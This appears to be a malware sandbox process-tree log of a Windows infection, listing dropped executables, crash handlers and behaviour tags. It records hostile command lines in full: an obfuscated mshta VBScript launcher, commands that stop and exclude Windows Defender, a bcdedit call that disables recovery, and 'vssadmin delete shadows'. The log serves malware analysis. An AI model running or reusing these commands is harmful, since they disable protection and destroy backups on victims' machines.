                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\97Vctn8Dd0qyW2WlKQhzbzmg.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:5776
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 256
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  PID:1684
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\pVkpU_ajJsLQjCkRvsrPguXw.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\pVkpU_ajJsLQjCkRvsrPguXw.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:3956
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 256
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:4116
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\CrfzkAErY5lpXHZm9LKT3Xns.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\CrfzkAErY5lpXHZm9LKT3Xns.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:4472
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 252
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          PID:6008
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\8KN2GTJjljKsX4AoDAohR99V.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\8KN2GTJjljKsX4AoDAohR99V.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                        PID:4136
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\kHWdgY8NedsFh4HO5MPZsgdD.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\kHWdgY8NedsFh4HO5MPZsgdD.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        PID:2056
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\kHWdgY8NedsFh4HO5MPZsgdD.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\kHWdgY8NedsFh4HO5MPZsgdD.exe" -q
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:5228
                                                                                                                                                                                                                                    • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                      C:\Windows\System32\sihclient.exe /cv ToWHb155H0a9PCpHBUabBw.0.2
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:3628
                                                                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:2520
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2408 -ip 2408
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                          PID:700
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:1524
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1376 -ip 1376
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                            PID:3032
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 612 -ip 612
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4604
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4140 -ip 4140
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5176
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3216 -ip 3216
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5124
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1608 -ip 1608
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:4804
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4240 -ip 4240
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:1956
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 3956 -ip 3956
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5724
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4472 -ip 4472
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5624
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 5228 -ip 5228
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5944
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 4656 -ip 4656
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:5420
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5632 -ip 5632
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              PID:1488
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2172 -ip 2172
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                              PID:5500
                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 568 -p 5464 -ip 5464
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4492
                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                PID:4492
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 82A6948D3449505DDA637A049BE34E6C C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:6304
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 299787EE7D19F134ACEFEC0C80A3F7DA C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:6548
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 9F2373A3F1F093A7382905C7F0FA0BD3
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:2848
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 4F054C6B2F09B07CD130D93490CA2D69 C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:7496
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding E529B50FAF8D1883EB0818E0EC01E895 C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:7456
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                  PID:2108
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:6672
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5196 -ip 5196
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                  PID:6248
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\37F4.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\37F4.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:6320
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 5140 -ip 5140
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                    PID:6392
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\437E.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\437E.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:6644
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6644 -s 260
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        PID:3580
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4EAB.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4EAB.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                      PID:6924
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5C48.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5C48.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                      PID:6164
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6644 -ip 6644
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      PID:3192
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\WERYWHE8tNUYNgLyHEqYHwVX.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\WERYWHE8tNUYNgLyHEqYHwVX.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:4892
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\WERYWHE8tNUYNgLyHEqYHwVX.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\WERYWHE8tNUYNgLyHEqYHwVX.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:7320
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              taskkill -f -iM "WERYWHE8tNUYNgLyHEqYHwVX.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                              PID:2264
                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -pss -s 620 -p 3712 -ip 3712
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:7360
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3052 -ip 3052
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:7352
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9B46.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9B46.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:7724
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6872 -ip 6872
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:5980
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6908 -ip 6908
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:2140
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5456 -ip 5456
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:5288
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2768 -ip 2768
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:572
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 6300 -ip 6300
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:7252
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1944 -ip 1944
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          PID:5184
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3252 -ip 3252
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:2256
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5776 -ip 5776
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                            PID:5160
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 3772 -ip 3772
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                            PID:6224
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 5956 -ip 5956
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                            PID:8020
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 7644 -ip 7644
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:7976
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8F5.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8F5.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                              PID:1352
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:2768
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 7164 -ip 7164
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                PID:1888
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\870F.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\870F.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:7188
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\c997cf17-48ba-45bc-bad5-e1030da386fb\AdvancedRun.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\c997cf17-48ba-45bc-bad5-e1030da386fb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c997cf17-48ba-45bc-bad5-e1030da386fb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:7732
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c997cf17-48ba-45bc-bad5-e1030da386fb\test.bat"
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:3492
                                                                                                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                                            sc stop windefend
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:7940
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\870F.exe" -Force
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:6472
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\870F.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\870F.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5192
                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:1376
                                                                                                                                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:1128
                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 728 -p 6348 -ip 6348
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                              PID:6388
                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:6280
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\FED1.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\FED1.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                PID:1284
                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                PID:5144
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1269.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1269.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:1012
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 292
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                    PID:1424
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1EDE.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1EDE.exe
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                  PID:2044
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                                                                                                                    PID:3964
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                      PID:1620
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 0
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                      PID:1256
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:7908
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                          PID:7320
